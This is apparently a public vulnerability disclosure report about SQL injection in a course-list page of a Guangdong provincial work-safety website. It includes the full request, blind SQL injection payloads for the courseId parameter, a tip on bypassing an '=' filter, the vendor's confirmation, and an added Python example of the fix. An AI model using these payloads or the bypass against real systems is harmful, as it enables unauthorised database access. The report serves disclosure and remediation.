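2015-12-03: Details reported to the vendor, awaiting vendor handling
2015-12-08: Vendor confirmed; details disclosed only to the vendor
2015-12-18: Details disclosed to core white hats and experts in related fields
2015-12-28: Details disclosed to regular white hats
2016-01-07: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public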
As the title says.
Affected system: Guangdong Provincial Work Safety Technology Center
Vulnerable URL:
POST /website/course/courseClientList.do HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 167
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/website/course/courseClientList.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=794B160AE2BCC5662797BE5E15E01AF9

courseForm.courseId=25773&courseForm.courseCateId=&courseForm.courseInfo.title=&courseForm.courseInfo.teachesr=%E9%99%88%E6%A1%82%E6%88%90&courseForm.courseInfo.hours=
The courseForm.courseId parameter is vulnerable to boolean-based blind and time-based blind SQL injection.
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: courseForm.courseId=25773) AND 1178=1178 AND (4327=4327&courseForm.courseCateId=&courseForm.courseInfo.title=&courseForm.courseInfo.teachesr=%E9%99%88%E6%A1%82%E6%88%90&courseForm.courseInfo.hours=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: courseForm.courseId=25773) AND (SELECT * FROM (SELECT(SLEEP(5)))HRff) AND (6060=6060&courseForm.courseCateId=&courseForm.courseInfo.title=&courseForm.courseInfo.teachesr=%E9%99%88%E6%A1%82%E6%88%90&courseForm.courseInfo.hours=
---
[15:34:21] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:34:21] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
The system filters the '=' character, so tamper=between has to be used to bypass the filter.
8 databases are involved.
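Why a '=' blacklist leaves the boolean-based condition intact while type validation plus a bound parameter removes it, as an added example (not code from the report or from the affected system). SQLite stands in for the MySQL back end, and the course table, the query shape and the function names are assumptions modelled on the reported payload.

```python
import re
import sqlite3

# Constructed inputs: the page's boolean payload with '=' rewritten as BETWEEN.
TRUE_INPUT = "25773) AND 1178 BETWEEN 1178 AND 1178 AND (4327 BETWEEN 4327 AND 4327"
FALSE_INPUT = "25773) AND 1178 BETWEEN 1179 AND 1179 AND (4327 BETWEEN 4327 AND 4327"

def make_db():
    # Constructed sample data in a hypothetical course table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE course (course_id INTEGER, title TEXT)")
    db.executemany("INSERT INTO course VALUES (?, ?)",
                   [(25773, "course A"), (25774, "course B")])
    return db

def lookup_blacklist(db, course_id):
    """Weak pattern: reject '=' in the input, then concatenate it into the SQL text."""
    if "=" in course_id:
        raise ValueError("rejected by '=' filter")
    sql = "SELECT title FROM course WHERE (course_id = " + course_id + ")"
    return [row[0] for row in db.execute(sql)]

def lookup_hardened(db, course_id):
    """Fix: allowlist the expected type, then bind the value as a parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", course_id):
        raise ValueError("courseId must be a decimal integer")
    # The bound value is data only; it is never parsed as part of the statement.
    cur = db.execute("SELECT title FROM course WHERE (course_id = ?)",
                     (int(course_id),))
    return [row[0] for row in cur]

def rejected(fn, db, value):
    """True if fn refuses the value with ValueError."""
    try:
        fn(db, value)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    db = make_db()
    for value in ("25773", TRUE_INPUT, FALSE_INPUT):
        # The blacklist version answers differently for the true/false condition.
        print("blacklist:", repr(lookup_blacklist(db, value)),
              "| hardened rejects:", rejected(lookup_hardened, db, value))
```

The differing result sets for the two constructed inputs are the signal a boolean-based blind test relies on; the hardened function gives neither input a path into the SQL text.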
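Severity: High
Vulnerability Rank: 10
Confirmed: 2015-12-08 14:41
Thank you very much for your report. The issue described in the report has been confirmed and reproduced. Data affected: High. Attack cost: Low. Impact: High. Overall rating: High, rank: 10. We are contacting the organization responsible for the website to handle it.
None yet.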